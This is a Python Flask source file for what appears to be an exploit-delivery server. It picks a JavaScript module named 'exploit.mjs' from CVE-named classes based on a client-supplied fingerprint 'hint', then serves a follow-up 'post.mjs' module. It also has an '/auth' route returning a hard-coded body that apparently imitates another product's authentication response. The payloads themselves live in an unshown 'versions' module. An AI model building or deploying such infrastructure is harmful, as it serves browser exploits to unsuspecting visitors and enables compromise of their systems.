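"""Flask application serving a landing page and two generated JavaScript modules.

Routes are mounted under BASE_PATH. The ``exploit.mjs`` and ``post.mjs``
endpoints return JavaScript rendered by classes from the sibling ``versions``
module. The class is chosen either by name from a query parameter or by
``versions`` itself from a client-supplied JSON "hint".
"""
import json
import os
import sys

from flask import Flask, request, redirect, make_response, send_from_directory

# Fix the python import path for this module so the sibling ``versions``
# module resolves regardless of the working directory.
modpath = os.path.dirname(__file__)
if modpath not in sys.path:
    sys.path.append(modpath)

import versions

import logging

logger = logging.getLogger(__name__)

app = Flask(__name__)

BASE_PATH = ""


def _load_hint():
    """Return the client's "hint" decoded from JSON, or None when unusable.

    The ``hint`` cookie takes precedence over the ``hint`` query parameter.
    A missing value, malformed JSON, or a JSON ``null`` all yield None so
    that callers fall back to the "Unknown" version response instead of
    failing the request with an unhandled exception.

    NOTE(review): the hint is fully client-controlled and is later handed to
    ``render()``; confirm that the renderer escapes any hint value it
    interpolates into the generated JavaScript.
    """
    raw = request.cookies.get("hint", request.args.get("hint"))
    if raw is None:
        return None
    try:
        return json.loads(raw)
    except ValueError:
        # json.JSONDecodeError is a ValueError. The raw value is deliberately
        # not logged because it is untrusted input.
        logger.warning("Ignoring malformed hint")
        return None


def _unknown_version_response():
    """Render the fallback module used when no usable hint was supplied.

    NOTE(review): this path does not set the text/javascript Content-Type
    that the normal path sets; whether ``render()`` already returns a typed
    response is not visible from this file.
    """
    return versions.Unexploitable.render({"version": "Unknown"})


def _find_by_name(base, name):
    """Return the first direct subclass of *base* whose ``name`` equals *name*.

    Only ``base.__subclasses__()`` is consulted, so the request parameter can
    select among classes that already exist and nothing else. Returns None
    when *name* is None or nothing matches.
    """
    if name is None:
        return None
    for cls in base.__subclasses__():
        if cls.name == name:
            return cls
    return None


def _javascript_response(body):
    """Wrap *body* in a response served as ``text/javascript``."""
    response = make_response(body)
    response.headers["Content-Type"] = "text/javascript"
    return response


@app.route(f"{BASE_PATH}/")
@app.route(f"{BASE_PATH}/index.html")
@app.route(f"{BASE_PATH}/xxx")
def index():
    """Serve ``index.html`` from the directory that contains this module."""
    return send_from_directory(os.path.dirname(__file__), "index.html")


@app.route(f"{BASE_PATH}/exploit.mjs")
def exploit():
    """Return the JavaScript module selected for the requesting client.

    Selection order: the ``e`` query parameter matched against the names of
    ``versions.CVE`` subclasses, then ``versions.get_exploit`` with the hint
    and the optional integer ``eindex`` query parameter (default 0).
    """
    hint = _load_hint()
    if hint is None:
        return _unknown_version_response()

    logger.warning("%s", request.args)

    selected = _find_by_name(versions.CVE, request.args.get("e"))
    if selected is None:
        # Determine the exploit index; a non-numeric value falls back to 0.
        try:
            eindex = int(request.args.get("eindex", "0"))
        except ValueError:
            eindex = 0
        selected = versions.get_exploit(hint, eindex=eindex)

    logger.warning("Selected exploit: %s", selected.name)
    return _javascript_response(selected.render(hint))


@app.route(f"{BASE_PATH}/auth")
def auth():
    """Return a fixed, hard-coded response body.

    The body is a static literal and does not depend on the request.
    """
    return """92833c4be54f5eaa03b63ff7a3a75440f63ca909b0aca84080ac3c877056a707e368df8dca438bea3cc913f58476f32feea3c8426618a149fdcd1995be720a9b1f1a7cb0f1a740e7901146c6e1bc7eac8319d94912b6326aeddd9f21ac6d674e5811fc7aa9c56488d42ac1ff6f433c79c0672af06a8fcc8989c6072f3aad9ac110001pvMKt46vRuquH_bO12edqw|OmIeLUW1nleF1IGEVXCJTQTO4P8h3sdw0.320.3218.12025.12025.1.020251.25.0508.0920unrestricted2.2301.0...yes/vizportal/api/clientxml/auth/pubkey50000falsetruetrue50443true443truetruefalsetruesamluser-passwordfalse"""


@app.route(f"{BASE_PATH}/post.mjs")
def post():
    """Return the follow-up JavaScript module selected for the client.

    Selection order: the ``p`` query parameter matched against the names of
    ``versions.Post`` subclasses, then ``versions.get_post`` with the hint.
    """
    hint = _load_hint()
    if hint is None:
        return _unknown_version_response()

    logger.warning("%s", request.args)

    selected = _find_by_name(versions.Post, request.args.get("p"))
    if selected is None:
        selected = versions.get_post(hint)

    return _javascript_response(selected.render(hint))


@app.errorhandler(404)
def not_found(e):
    """Redirect any unknown path to the landing page.

    The target honours BASE_PATH so the redirect stays valid when the
    application is mounted under a prefix. The request path and arguments
    are intentionally not echoed back to the client.
    """
    return redirect(f"{BASE_PATH}/index.html", code=302)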